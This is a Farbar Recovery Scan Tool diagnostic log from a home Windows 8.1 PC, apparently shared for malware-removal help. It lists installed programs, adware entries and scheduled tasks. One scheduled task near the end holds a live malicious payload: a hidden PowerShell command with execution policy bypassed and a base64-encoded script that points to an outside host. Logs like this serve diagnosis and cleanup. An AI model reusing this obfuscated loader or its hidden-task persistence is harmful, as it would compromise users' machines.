LastRegBack: 2016-01-04 03:10
 
==================== End of FRST.txt ============================
 
 
 
 
Additional scan result of Farbar Recovery Scan Tool (x64) Version:31-12-2015
Ran by Joseph (2016-01-04 21:00:59)
Running from C:\Users\Joseph\Downloads
Windows 8.1 Connected (X64) (2014-12-17 02:46:18)
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-1412126346-3748250155-1825200208-500 - Administrator - Disabled)
Guest (S-1-5-21-1412126346-3748250155-1825200208-501 - Limited - Disabled)
Joseph (S-1-5-21-1412126346-3748250155-1825200208-1002 - Administrator - Enabled) => C:\Users\Joseph
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
"Outlast" (HKLM-x32\...\{F5489388-87F5-42D3-B8C7-598F32FB2260}_is1) (Version: 1.0.12046.0 (Update 8) - )
Adobe Flash Player 19 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 19.0.0.185 - Adobe Systems Incorporated)
Adobe Shockwave Player 12.0 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.0.4.144 - Adobe Systems, Inc.)
Amnesia - The Dark Descent  (HKLM-x32\...\{54B7A3C7-0940-4C16-A509-FC3C3758D22A}_is1) (Version: 1.0.0 - Frictional Games)
Amnesia The Dark Descent ver. 1.3.1 (HKLM-x32\...\{09123290-33QW-22ZA-00X5-55GWAF2186QS}_is1) (Version: 1.3.1 - Frictional Games)
Apple Application Support (32-bit) (HKLM-x32\...\{C5815ACF-FD34-4553-8A22-C7411B7E662B}) (Version: 4.1.1 - Apple Inc.)
Apple Application Support (64-bit) (HKLM\...\{CBF12D2F-CF64-4CB7-858B-2C1F21068E5F}) (Version: 4.1.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{3540181E-340A-4E7A-B409-31663472B2F7}) (Version: 9.1.0.6 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{FFD1F7F1-1AC9-4BC4-A908-0686D635ABAF}) (Version: 2.1.4.131 - Apple Inc.)
Ashampoo WinOptimizer 11 (HKLM-x32\...\{4209F371-8D72-8119-66FA-897D2D41E27F}_is1) (Version: 11.00.70 - Ashampoo GmbH & Co. KG)
AVG SafeGuard toolbar (HKLM-x32\...\AVG SafeGuard toolbar) (Version: 19.1.0.285 - AVG Technologies)
Bandisoft MPEG-1 Decoder (HKLM-x32\...\BandiMPEG1) (Version:  - )
BlueStacks App Player (HKLM-x32\...\BlueStacks App Player) (Version: 0.9.30.9239 - BlueStack Systems, Inc.)
BlueStacks Notification Center (HKLM-x32\...\{3792811C-832F-4392-B44A-24092901EDDC}) (Version: 0.9.30.9239 - BlueStack Systems, Inc.)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
CCleaner (HKLM\...\CCleaner) (Version: 5.11 - Piriform)
CyberLink Media Suite 10 (HKLM-x32\...\InstallShield_{1FBF6C24-C1fD-4101-A42B-0C564F9E8E79}) (Version: 10.0.9.4928 - CyberLink Corp.)
CyberLink Power Media Player 12 (HKLM-x32\...\InstallShield_{B46BEA36-0B71-4A4E-AE41-87241643FA0A}) (Version: 12.0.6.5104 - CyberLink Corp.)
CyberLink Power2Go 8 (HKLM-x32\...\InstallShield_{2A87D48D-3FDF-41fd-97CD-A1E370EFFFE2}) (Version: 8.0.10.5422 - CyberLink Corp.)
CyberLink YouCam (HKLM-x32\...\InstallShield_{01FB4998-33C4-4431-85ED-079E3EEFE75D}) (Version: 5.0.6.5011 - CyberLink Corp.)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
DisableMSDefender (Version: 1.0.0 - Hewlett-Packard Company) Hidden
Elgato Game Capture HD (HKLM-x32\...\{B3837224-9767-4976-8148-3C72E96FF527}) (Version: 2.10.72.879 - Elgato Systems GmbH)
Emsisoft Anti-Malware (HKLM-x32\...\{5502032C-88C1-4303-99FE-B5CBD7684CEA}_is1) (Version: 9.0 - Emsisoft Ltd.)
Energy Star (HKLM\...\{465CA2B6-98AF-4E77-BE22-A908C34BB9EC}) (Version: 1.0.9 - Hewlett-Packard Company)
Game Capture HD v2.3.3.38 (HKLM-x32\...\Software_Elgato_Game Capture HD) (Version: 2.3.3.38 - Elgato Systems)
Game Capture HD60 v2.1.1.3 (HKLM-x32\...\Software_Elgato_Game Capture HD60) (Version: 2.1.1.3 - Elgato Systems)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 47.0.2526.106 - Google Inc.)
Google Talk Plugin (HKLM-x32\...\{CA3DD97D-1FD7-37A7-BD5C-FC4430C8B8E6}) (Version: 5.41.2.0 - Google)
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.29.1 - Google Inc.) Hidden
GTA V (HKLM-x32\...\GTA V) (Version: 2.1.0.0 - XB36Hazard)
Hewlett-Packard ACLM.NET v1.2.2.3 (x32 Version: 1.00.0000 - Hewlett-Packard Company) Hidden
HP Documentation (HKLM-x32\...\{F29E3AA8-CF19-4452-92B7-F1FE31CD11C5}) (Version: 1.1.0.0 - Hewlett-Packard)
HP Registration Service (HKLM\...\{D1E8F2D7-7794-4245-B286-87ED86C1893C}) (Version: 1.2.7372.4698 - Hewlett-Packard)
HP SimplePass (HKLM-x32\...\InstallShield_{314FAD12-F785-4471-BCE8-AB506642B9A1}) (Version: 8.01.46 - Hewlett-Packard)
HP Support Solutions Framework (HKLM-x32\...\{55065080-504F-43BB-BE00-36B80D7D39A5}) (Version: 12.0.30.219 - Hewlett-Packard Company)
HP System Event Utility (HKLM-x32\...\{6B1ECC61-B581-400D-BFAF-101B1AAEA5AB}) (Version: 1.4.7 - Hewlett-Packard Company)
HP Utility Center (HKLM\...\{891A1782-8B20-4403-8383-458962525926}) (Version: 2.3.4 - Hewlett-Packard Company)
HP Wireless Button Driver (HKLM-x32\...\{EFA01423-3857-468C-B7B6-F30AA08E50BC}) (Version: 1.1.5.1 - Hewlett-Packard)
Inst5675 (Version: 8.01.46 - Softex Inc.) Hidden
Inst5676 (Version: 8.01.46 - Softex Inc.) Hidden
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3958 - Intel Corporation)
Intel® Sideband Fabric Device Driver (HKLM-x32\...\C5A8BC6E-723A-4C0F-96E1-C426D1A4BCA9) (Version: 1.70.305.16316 - Intel Corporation)
Intel® Trusted Execution Engine (HKLM\...\{176E2755-0A17-42C6-88E2-192AB2131278}) (Version: 1.0.0.1064 - Intel Corporation)
Itibiti RTC (x32 Version: 0.0.1 - Itibiti Inc) Hidden
iTunes (HKLM\...\{0D44E3A4-6C3D-45D7-B443-079509E5BE5D}) (Version: 12.3.2.35 - Apple Inc.)
Java 8 Update 66 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218066F0}) (Version: 8.0.660.18 - Oracle Corporation)
Malwarebytes Anti-Malware version 2.2.0.1024 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.0.1024 - Malwarebytes)
Mediatek Bluetooth (HKLM\...\{904C579C-9366-D3B7-7F31-4879401DBD4A}) (Version: 11.0.756.0 - Mediatek)
Microsoft Mouse and Keyboard Center (HKLM\...\Microsoft Mouse and Keyboard Center) (Version: 2.5.166.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.21022 (HKLM\...\{350AA351-21FA-3270-8B7A-835434E766AD}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Movie Maker (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Mozilla Firefox 42.0 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 42.0 (x86 en-US)) (Version: 42.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 42.0.0.5780 - Mozilla)
Mumble 1.2.10 (HKLM-x32\...\{63243F5C-E941-4461-A4B0-2689A9A3BF13}) (Version: 1.2.10 - Thorvald Natvig)
QuickTime 7 (HKLM-x32\...\{627FFC10-CE0A-497F-BA2B-208CAC638010}) (Version: 7.77.80.95 - Apple Inc.)
Ralink RT3290 802.11bgn Wi-Fi Adapter (HKLM-x32\...\{8FC4F1DD-F7FD-4766-804D-3C8FF1D309AF}) (Version: 5.0.50.0 - Mediatek)
RealDownloader (x32 Version: 18.1.2.176 - RealNetworks, Inc.) Hidden
RealDownloader (x32 Version: 18.1.2.179 - RealNetworks) Hidden
RealNetworks - Microsoft Visual C++ 2008 Runtime (x32 Version: 9.0 - RealNetworks, Inc) Hidden
RealNetworks - Microsoft Visual C++ 2010 Runtime (Version: 10.0 - RealNetworks, Inc) Hidden
RealNetworks - Microsoft Visual C++ 2010 Runtime (x32 Version: 10.0 - RealNetworks, Inc) Hidden
RealPlayer (RealTimes) (HKLM-x32\...\RealPlayer 18.1) (Version: 18.1.2 - RealNetworks)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.3.9600.29082 - Realtek Semiconductor Corp.)
Realtek Ethernet Controller All-In-One Windows Driver (HKLM-x32\...\{F7E7F0CB-AA41-4D5A-B6F2-8E6738EB063F}) (Version: 8.35.716.2014 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7673 - Realtek Semiconductor Corp.)
RealUpgrade 1.1 (x32 Version: 1.1.0 - RealNetworks, Inc.) Hidden
SafeZone Stable 1.46.1990.139 (x32 Version: 1.46.1990.139 - Avast Software) Hidden
Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 7.5.0.9082 - Microsoft Corporation)
Skype™ 7.17 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.17.105 - Skype Technologies S.A.)
SOMA (HKLM-x32\...\1439487606_is1) (Version: 2.0.0.1 - GOG.com)
SUPERAntiSpyware (HKLM\...\{CDDCBBF1-2703-46BC-938B-BCC81A1EEAAA}) (Version: 6.0.1204 - SUPERAntiSpyware.com)
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 18.1.7.20 - Synaptics Incorporated)
UpdateService (x32 Version: 1.0.0 - RealNetworks, Inc.) Hidden
Video Downloader (x32 Version: 1.0.0 - RealNetworks) Hidden
Visual Studio 2012 x64 Redistributables (HKLM\...\{8C775E70-A791-4DA8-BCC3-6AB7136F4484}) (Version: 14.0.0.1 - AVG Technologies)
Visual Studio 2012 x86 Redistributables (HKLM-x32\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
WinDirStat 1.1.2 (HKU\S-1-5-21-1412126346-3748250155-1825200208-1002\...\WinDirStat) (Version:  - )
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3508.0205 - Microsoft Corporation)
WinRAR 5.20 (32-bit) (HKLM-x32\...\WinRAR archiver) (Version: 5.20.0 - win.rar GmbH)
XSplit Gamecaster (HKLM-x32\...\{8915913F-E4AF-46C5-B4EF-3535D83BFFDE}) (Version: 2.5.1507.3018 - SplitmediaLabs)
 
==================== Custom CLSID (Whitelisted): ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== Scheduled Tasks (Whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {1295A64D-7E43-424F-8543-A05B74201989} - System32\Tasks\Bitdefender Update Product Data_A17FD818A96743FAB28AC221BEB4B2C8 => C:\Program Files\Bitdefender\Bitdefender 2015\bdproductdata.exe
Task: {13BC6DCF-C733-402A-8228-5769991BB484} - System32\Tasks\SUPERAntiSpyware Scheduled Task 0e5ae95f-73dd-4db3-b20f-59643e5fb995 => C:\Program Files\SUPERAntiSpyware\SASTask.exe [2013-11-07] (SUPERAdBlocker.com)
Task: {174B031E-D059-4CE2-AE6D-78DF825BE2B8} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Active Health Launcher => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPActiveHealth\ActiveHealth.exe [2015-11-04] (Hewlett-Packard)
Task: {181BDCAC-C6F3-4D9F-8AA9-14B084A78D17} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2015-09-28] (Hewlett-Packard Company)
Task: {18320BA6-FABB-4677-A608-422F37C0D070} - System32\Tasks\HPCeeScheduleForLILJOETHEMASTER$ => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [2015-06-16] (Hewlett-Packard)
Task: {1DAFE177-32F1-4EF2-BB76-E7A980CAE1C6} - System32\Tasks\Microsoft_Hardware_Launch_itype_exe => c:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe [2015-07-08] (Microsoft Corporation)
Task: {1EE322FB-21DC-4BD0-AF70-03205B9CB475} - System32\Tasks\Start OPBHOBroker => C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBroker.exe [2015-07-02] (Hewlett-Packard)
Task: {216CD462-4EB7-4B26-8F63-30D24C039B05} - System32\Tasks\Synaptics TouchPad Enhancements => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2015-02-26] (Synaptics Incorporated)
Task: {26352109-A64F-4A96-9573-237685633338} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2015-09-27] (Hewlett-Packard)
Task: {2DE38443-6947-4354-A02B-F1D2D3CE232F} - \SushiLeads -> No File <==== ATTENTION
Task: {32DF6C65-E5CF-4B23-BBF9-2D77E33D4D64} - System32\Tasks\{791DC80A-EF5D-4A10-9ED8-587064C137D1} => pcalua.exe -a "C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe" -c scenario=install scenariosubtype=uninstall baseurl="C:\Program Files\Microsoft Office 15" platform=x86 version=15.0.4745.1002 culture=en-us productstoremove=O365HomePremRetail_en-us_x-none
Task: {369ADB15-96E8-499B-974A-E5CE36DBFF97} - System32\Tasks\RealDownloaderRealUpgradeScheduledTaskS-1-5-21-1412126346-3748250155-1825200208-1001 => C:\Program Files (x86)\RealNetworks\RealDownloader\RealUpgrade.exe [2015-11-04] (RealNetworks, Inc.)
Task: {37954EA6-C426-4DF2-BEFB-C8808F8D9556} - System32\Tasks\Microsoft_MKC_Logon_Task_ipoint.exe => c:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe [2015-07-08] (Microsoft Corporation)
Task: {43704DA6-5DA2-4FA5-92F9-056730613525} - System32\Tasks\RealDownloaderRealUpgradeLogonTaskS-1-5-21-1412126346-3748250155-1825200208-1001 => C:\Program Files (x86)\RealNetworks\RealDownloader\RealUpgrade.exe [2015-11-04] (RealNetworks, Inc.)
Task: {4CEDAA3B-4B85-4AA1-8401-C8A88E6C636D} - System32\Tasks\RealDownloader Update Check => C:\Program Files (x86)\RealNetworks\RealDownloader\downloader2.exe [2015-11-04] ()
Task: {4DE8A45A-8701-4465-80A0-2DCA4A4F167D} - System32\Tasks\Microsoft_Hardware_Launch_ipoint_exe => c:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe [2015-07-08] (Microsoft Corporation)
Task: {4DEC58EC-2055-41C3-A875-40118819E290} - System32\Tasks\Java Platform SE Auto Updater => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [2015-11-09] (Oracle Corporation)
Task: {5779E7C9-3608-472C-B6D5-EF75AD449C86} - System32\Tasks\{E693F854-294C-4AB5-ACD3-643D86AC9438} => pcalua.exe -a "C:\Program Files (x86)\AVG\AVG2015\avgmfapx.exe" -c /AppMode=SETUP /Uninstall /UDS=1
Task: {5A35B225-B856-4EF0-9A2D-4C4FBE1340A3} - \IBUpd2 -> No File <==== ATTENTION
Task: {5C4547C5-FA0A-4612-8F6B-768F0D69DAED} - System32\Tasks\RealDownloaderRealUpgradeLogonTaskS-1-5-21-1412126346-3748250155-1825200208-1002 => C:\Program Files (x86)\RealNetworks\RealDownloader\realupgrade.exe [2015-11-04] (RealNetworks, Inc.)
Task: {5E2064DA-9DA8-4F13-8F1B-D382FDC1D7F3} - System32\Tasks\Start SimplePass => C:\Program Files\Hewlett-Packard\SimplePass\ClientCore.exe [2015-07-02] (Hewlett-Packard)
Task: {60412123-B76A-4A18-AF63-52B49C14CB8E} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2015-10-19] (Piriform Ltd)
Task: {6C90C421-86AE-4430-B682-6D6950C5E15B} - System32\Tasks\Start OPBHOBrokerDesktop => C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBrokerDsktop.exe [2015-07-02] (Hewlett-Packard)
Task: {6ED97F40-1A12-491B-852A-838D8CA227AF} - System32\Tasks\{087E7947-7E7E-0C0F-0D11-7A050B79117A} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAGYAbwByAGEAbABsAHMAaABvAHAALgBpAG4AZgBvAC8AdQAvAD8AYQA9AGIAZQA1AHQALQBEAFgAMQBSAFgAdQBqAG0ASwBDAGgAcwBaADkAXwBlAGIAQQBUADEAWQBzADUAYQBZAEUASAA1AFEATABoADMAMQBDAG8ANgB6AGMAaQA4ADgAMQBoADUAWABsAFQAQQB6AEcAaQBYAFUAQgBoADEAbwBLAEEAcABpAFgAZgBTADYASQBmAHQASAA4ADYALQB4AE0ATABKAEwARQB6AHAAVAB0AEkAdgBhAFYAQwA2ADQAbABpADgARgBYAE0ANwA4AFMANgBFAGMAQQBMAEkALQAwAE0AVABxAFIAYQBWAEwASQBSAGMAWgBBAFgATgAtAGQAcABpAHgAeABVADAAaQBGAHMAdQBMAEMAawBjAGMAMABmADkATABSAEcASgBqAEMAbAAxADIARABSAEwAagBPAFMAagB3AG0ASgBUAFUAcABhAC0AUwBnAGEAWQBTAFoATQBHADMAVABZAGoAOQBvAFoARgBWAG8ATgB2AGoAXwBzAEQAeABRADkAUwBPAEcAeABvAHAAaQA5AGsAUwBHAFIAcQA4AEkAWQBIAGgAVwBQAEkARQAyAEIAdABqADgAawBNAEkAVABOAG0ARgBLADkASAA0AEYARgBjADkAOABHAGMAUgBQAGQAbAAxAEEANQBhAHkALQBuAGsANwBsAHgAcwBEAEkAWgBUAC0AdgBjAGUAUgB1AFQAdABIAFEAcABjAHkARQBmAEsAbwBFAFMANgB1AEsAQwBCAGMAcQBTADYAZABHAHQAcwA5AFQAUwBCAFEATgBJAEUANwAzAFMAVQBjAHUAMgAyAFUAdwAtAFEASwBTAEcAdQBPAFIAeABrAGYAVQB5ADcANgBiAC0AQQB6AGYANQBkAG0ATQBFAF8ARABxAHoAZQBPAHYAaABOAEMARgBWADMAdQBIAGYAUgBDADIAMABFADMAZwBUAEkAWQBnAHQAcwAwAHUAbgBuAEkATgBtAHAAbgBqAFAAQgBDAFUARABJAHEARQBfAFAAdgA0AG0AVwBtAGcANgBLAEgASABqAGQAegBzAFcARwB1AEoASABHAG4ASQBhAC0ALQBYADAAUgBQAGMAbQBuADMARABVAEIAXwBoAGUATwBwAGcAdABXAEEAeABYAHcASQBaAFAAZgBkAFcAZgB3AHYATABlADgAaQBSAFYAdABYAFYAcAA3AFEAZwBHADUAdwBiAHgAYgBUAEIAcgBzAEsAQQBXAFIAUABMADgAaAB3AEgAdQBoAFUAVQBOAG4AZwBTAEsAeQBYADIAbABVAGEARQAtAHgARwBjAEUAawBLAGUAcAB0AFEAWgBhAHQAQQAtAFMAagBjAHUAcwBTAFQAUgBKAE4AQQBuAGIAcQBXAGkANQBmAEUAaABDAE4ATQBaAF8AWAB2ADQAVgBtADQARQBxAFQAUgBVAFUAWABCAGgAcwBvAGQANQB5AGsAdQBFADEAZwBOAEQAZwBRAHQAeQBOAG8AbABJAE0AQgBBAHkAdABzAE0AeABIAG0ALQBRAFkAdABCAGoANABxADUAWQBDADUANgBhAHAAagBPAEgAZABaAHMAMABrAEkATwBPAGUAaABqADUAWQBXAFcANQBOAGwARwBJAGIANwBTAHoARwB2AEsARQBUAG8AbQBtADMALQA4AF8AMwBIADIAYQA0ADIASABFADIAaQBSADAASQB2AG0AdABoAE8AZQBSAGcAZABsAE4AYwBTAEkAQQA2AFcASwBuAFgANgBrAEMAcgBPAEgAMgBjAFgAQwBVAFAAaAB5AGgAagBqAFUAOQBJADYAUAAtAEwAUwA4AC0AeQBRAEkALQA4ADYAYQBDAHYAaABKAGoAWgBHAGwATABOAHUAcgBUAGoAOQAxAG0AMQBmAFQALQBUAHUATwB0AGcAOAB5AG4AdQBnAFAAVwBuAGcAUgBwAGoAMQA3AGYALQAxAE8AVQBhADYAUwA2AEsAUgBvAE0ATAAtAFMAawBCAGYAagBaAHUAMABzAF8AcgBTAFAAbAA1AGYAYQBEAE4ARQA3AFgAMwBCADMAcAB5ADgAQwByAHUATABYAFUAaQB6AFoASwAzAFMAdAAxAG4AawBNAHEASABoAFYANABpAFAAZQBIADcAegBaAEMAbgBHAFUATwA3AHgAeQBwAFQANAB2AE4AZQBBADUANABjAGsAOABGAFAAVQBQAFEAcwBfADcAZgBlADgASgBUAGcAdABEAEoAcABBAHoAMQB6ADgARgBFAFcAVwBSAGEAQgBJADAAYQBqAHIAdABUAHUAYQBmAEIAMQBXAGgASQAwAHMAZABYAF8AdgAyAFIAVwBMADAATgBaAE0AegBwAE4AUQA4AFkAMQBPAGsASQAmAGMAPQBwAEEARgBJADQAdwByAHcAWgBSAEoAZQBRADEARwBfAGUAYgBDAGMARQBtAFQAYQBpAG8ASQBmAHEARwBHAE8ARQAyAFEAMABLAFEAbQBGAGQALQBqAC0AXwB2AFoAVgBUAGIARAA2AEoALQBqAG0ASQBEAE8AOQBBAEoARABjAEgATQBDAHAANABOAGsAVgAwAGEAQwBEAFYAOQAtAFAAaQBqAHcAbABSAGgALQBvADMAMABhAEkAawBuADMATgA2AE8AbABlADIAeQBXAFoAUQBOAHQAdQBUAFgAZwAwADcAegBWAFcATAA4AEUARgBDAHUAdwB2AGEAMwB4AEsAeQBVADEAOQB5AEIARAA5AE4AegBjAE0AWABKAEEASwBBAGcARgBuAGEAVgBkAHIAegB2ADIAcAAxAHoAbABUAE8ANQBuAE8AdgBjAHIAdQBlAEIARABsAG0AbQA4AGcARQAwAE4AOQB5AG0AVABHAHQAdgBoAFUAdgB2AFAAUQBTADkAUABOADQAcgBzAE4ARABMAEUAeQBoAFgAZwA3AHIAVQBpAGoAQwBWADgAaABvAEMAUQBnAEsATABwAGsAeAAzAEUAbABRAFIAZABlAGUANABqAEMANAAwAFkANABhAFMAawBNAEMAXwBIAEYAaQBUAHcAbwBxAEoAZgBRAEgAMwBvAEUAbAB1ADgATQBwADkAbwB1AGoAYQBWAEYAMABwAGoAOABoADMAOQBEADEASQB1AHUAOAAtAFoAUQBpAFEAcwBrAE0AeQBaADAATQBvAFMASABEAHoALQBhADUAcwBWAGUANQBMAGIAOABjAGoASQA1AG8AWQAyAEkAUgBzAEkAMABCAFUAcQBmAGEAdABIADYAdwB2AHMAcQA2AGUATgBNAEoARwBRAE4AeABYAGEAYgB1AGwAMABNAHEAeABPAHoANwAzAFcAMgBkADUAQgBsAGsAYgBPAG4AdQB1AHMAaABWAFMAagBtAFkAcQBKADkAZABhAGkANAAwAHcAMABiAHYAMQBNAHIAQwBpADIASQBOAFEARgA3AE8ATQB4ADUAcgB5AHAATQBOADkAYQB5ADgAMABMAF8AZQAxAEMAOABVAFkAeQBYAGgARwB0ADAAWAA0AFkAYgBZAE4AZwA1AEIAWgBoAEEA